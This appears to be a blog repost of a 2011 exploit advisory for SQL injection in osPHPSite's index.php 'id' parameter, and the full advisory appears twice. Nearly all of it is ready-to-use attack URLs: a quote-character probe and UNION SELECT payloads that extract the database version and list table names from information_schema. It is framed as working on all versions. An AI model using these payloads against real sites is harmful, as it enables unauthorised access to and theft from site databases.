# Exploit Title: osPHPSite SQL Injection Vulnerability
# Author : vir0e5
# Date : 1-12-2011
# Vendor : http://www.osphpsite.com
# Software Link: http://sourceforge.net/projects/osphpsite
# Version: ALL VERSION
[ Vulnerable File ]
~ index.php
[ Exploit ]
~ http://www.[sitename].com/index.php?id=[Sql Injection]
[ example ]
~ http://www.[sitename].com/index.php?id=24'
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8--
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
~ And More.....
********************************************
# Author : vir0e5
# Date : 1-12-2011
# Vendor : http://www.osphpsite.com
# Software Link: http://sourceforge.net/projects/osphpsite
# Version: ALL VERSION
[ Vulnerable File ]
~ index.php
[ Exploit ]
~ http://www.[sitename].com/index.php?id=[Sql Injection]
[ example ]
~ http://www.[sitename].com/index.php?id=24'
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8--
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
~ And More.....
********************************************
Labels: Security Advisories, SQL Injection, Vulnerability
0 Comments:
Post a Comment
<< Home